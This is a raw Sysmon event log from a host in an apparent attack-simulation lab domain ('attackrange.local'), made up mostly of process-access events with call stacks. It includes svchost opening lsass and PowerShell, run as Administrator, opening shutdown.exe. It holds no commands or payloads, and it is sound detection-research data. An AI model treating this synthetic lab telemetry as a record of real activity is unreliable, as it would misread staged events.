12:00:02.873{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.873{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.873{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.764{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.764{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.764{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.732{266CAFBE-6442-6064-E302-00000000AD01}3020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.701{266CAFBE-6442-6064-E402-00000000AD01}4600ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.670{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E502-00000000AD01}2856C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E502-00000000AD01}2856C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-6442-6064-E402-00000000AD01}46005052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6442-6064-E502-00000000AD01}2856C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+91a057e9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e88c72|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e888ad|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+91950bab|C:\Windows\assembly\NativeImages_v4.0.